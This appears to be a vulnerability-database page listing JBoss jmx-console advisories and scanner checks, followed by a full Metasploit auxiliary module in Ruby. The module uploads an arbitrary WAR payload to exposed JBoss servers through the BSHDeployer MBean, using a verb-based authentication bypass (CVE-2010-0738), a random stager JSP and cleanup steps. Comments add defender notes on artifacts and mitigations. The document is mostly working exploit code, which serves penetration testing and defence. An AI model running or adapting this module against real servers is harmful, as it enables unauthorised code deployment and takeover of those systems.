| Reporter | Title | Published | Views | Family All 83 |
|---|---|---|---|---|
| JBoss, JMX Console, misconfigured DeploymentScanner | 2 Oct 2011 00:00 | – | zdt | |
| Hewlett-Packard UCMDB 10.10 JMX-Console Authentication Bypass Vulnerability | 4 Feb 2015 00:00 | – | zdt | |
| JBoss EAP < 4.2.0.CP09 / 4.3.0.CP08 Multiple Vulnerabilities | 29 Apr 2010 00:00 | – | nessus | |
| HP-UX PHSS_42328 : s700_800 11.X OV NNM9.00 NNM 9.0x Patch 5 | 6 Mar 2012 00:00 | – | nessus | |
| JBoss Enterprise Application Platform '/jmx-console' Authentication Bypass | 8 Apr 2011 00:00 | – | nessus | |
| Juniper Junos Space < 13.3R1.8 Multiple Vulnerabilities (JSA10627) | 22 Dec 2014 00:00 | – | nessus | |
| RHEL 4 : JBoss EAP (RHSA-2010:0376) | 24 Jan 2013 00:00 | – | nessus | |
| RHEL 4 : JBoss EAP (RHSA-2010:0377) | 24 Jan 2013 00:00 | – | nessus | |
| RHEL 5 : JBoss EAP (RHSA-2010:0378) | 24 Jan 2013 00:00 | – | nessus | |
| RHEL 5 : JBoss Enterprise Application Platform 4.3.0.CP08 update (Critical) (RHSA-2010:0379) | 24 Jan 2013 00:00 | – | nessus | |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
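# Auxiliary module that installs (action "Deploy") or removes (action
# "Undeploy") a WAR file on a JBoss server through the BSHDeployer MBean of an
# exposed "jmx-console" application.
#
# Helpers called below but not defined in this file (http_verb, generate_bsh,
# deploy_bsh, deploy_package, deploy, stager_jsp) presumably come from the
# included Msf::Exploit::Remote::HTTP::JBoss mixin -- confirm against the mixin.
#
# Defender notes, derived from what this code sends and creates:
# * Precondition is a reachable jmx-console. The CVE-2010-0738 reference is
#   annotated "using a VERB other than GET/POST", so access control on the
#   console should cover every HTTP verb, not only GET and POST; removing or
#   firewalling the console takes away the entry point altogether.
# * File-system artifacts: "<APPBASE>.war" (APPBASE defaults to "payload") and,
#   in the non-POST path, a short-lived "<name>.war/<name>.jsp" whose name is
#   8 to 15 random alphabetic characters.
# * HTTP artifacts in the non-POST path: one POST to "/<name>/<name>.jsp" with a
#   single randomly named form field holding the URL-encoded base64 WAR,
#   followed by a BSHDeployer call that deletes the stager again.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::JBoss

  # Registers module metadata, the two actions and the user-settable options.
  def initialize
    super(
      'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',
      # The lines are joined with "\n"; the empty first and last entries give
      # the text a leading and a trailing newline.
      'Description' => [
        '',
        'This module can be used to install a WAR file payload on JBoss servers that have',
        'an exposed "jmx-console" application. The payload is put on the server by',
        "using the jboss.system:BSHDeployer's createScriptDeployment() method.",
        ''
      ].join("\n"),
      'Author' => [
        'us3r777 <us3r777[at]n0b0.so>'
      ],
      'References' => [
        [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
        [ 'OSVDB', '64171' ],
        [ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],
        [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]
      ],
      'Actions' => [
        ['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],
        ['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]
      ],
      'DefaultAction' => 'Deploy',
      'License' => BSD_LICENSE
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('APPBASE', [ true, 'Application base name', 'payload']),
        # Not marked required because the Undeploy action does not need it;
        # #run checks it for the Deploy action.
        OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])
      ]
    )
  end

  # Writes the WAR to the server as "<app_base>.war".
  #
  # When http_verb is 'POST' the base64-encoded WAR is handed to the BSH script
  # directly. For any other verb a small stager JSP is written first, the WAR
  # is then POSTed to that stager, and the stager is deleted afterwards.
  #
  # @param app_base [String] base name of the WAR (without the ".war" suffix)
  # @param war_data [String] raw bytes of the WAR file
  # @return [void] progress and failures are reported through print_* only
  def deploy_action(app_base, war_data)
    encoded_payload = Rex::Text.encode_base64(war_data).delete("\n")
    # Evaluated once so the setup branch and the follow-up branch cannot
    # disagree; stager_name only exists on the non-POST path.
    direct_upload = http_verb == 'POST'

    if direct_upload
      print_status('Deploying payload...')
      opts = {
        file: "#{app_base}.war",
        contents: encoded_payload
      }
    else
      print_status('Deploying stager...')
      stager_name = Rex::Text.rand_text_alpha(rand(8..15))
      stager_contents = stager_jsp(app_base)
      opts = {
        dir: "#{stager_name}.war",
        file: "#{stager_name}.war/#{stager_name}.jsp",
        contents: Rex::Text.encode_base64(stager_contents).delete("\n")
      }
    end

    package = deploy_bsh(generate_bsh(:create, opts))
    if package.nil?
      print_error('Deployment failed')
      return
    end
    print_good('Deployment successful')

    # Direct upload is finished here; the rest only concerns the stager.
    return if direct_upload

    # Call the stager so it writes the real WAR. The form field name is random;
    # only its value (the URL-encoded base64 WAR) is built here.
    stager_uri = "/#{stager_name}/#{stager_name}.jsp"
    payload_data = "#{Rex::Text.rand_text_alpha(rand(8..15))}=#{Rex::Text.uri_encode(encoded_payload)}"
    print_status("Calling stager #{stager_uri} to deploy final payload...")
    res = deploy('method' => 'POST',
                 'data' => payload_data,
                 'uri' => stager_uri)
    if res&.code == 200
      print_good('Payload deployed')
    else
      print_error('Failed to deploy final payload')
    end

    # The stager is removed whether or not the final deployment succeeded, so
    # a failed run does not leave the JSP behind.
    print_status('Removing stager...')
    files = {
      stager_jsp_name: "#{stager_name}.war/#{stager_name}.jsp",
      stager_base: "#{stager_name}.war"
    }
    res = deploy_package(generate_bsh(:delete, files), package)
    if res.nil?
      print_error('Unable to remove Stager')
    else
      print_good('Stager successfully removed')
    end
  end

  # Deletes "<app_base>.war" from the server through a BSHDeployer delete
  # script. Only the WAR is removed here; the stager is cleaned up by
  # #deploy_action itself.
  #
  # @param app_base [String] base name of the WAR (without the ".war" suffix)
  # @return [void]
  def undeploy_action(app_base)
    print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")
    delete_script = generate_bsh(:delete, { app_base: "#{app_base}.war" })
    package = deploy_bsh(delete_script)
    if package.nil?
      print_error('Unable to remove WAR')
    else
      print_good('Successfully removed')
    end
  end

  # Entry point: dispatches on the selected action.
  #
  # For 'Deploy' the WARFILE option must name a regular file. File.file? is
  # used rather than File.exist? so that a directory path is reported as
  # 'WAR file not found' instead of raising when it is read.
  #
  # @return [void]
  def run
    app_base = datastore['APPBASE']

    case action.name
    when 'Deploy'
      war_path = datastore['WARFILE']
      unless war_path && File.file?(war_path)
        print_error('WAR file not found')
        return
      end

      deploy_action(app_base, File.binread(war_path))
    when 'Undeploy'
      undeploy_action(app_base)
    end
  end
end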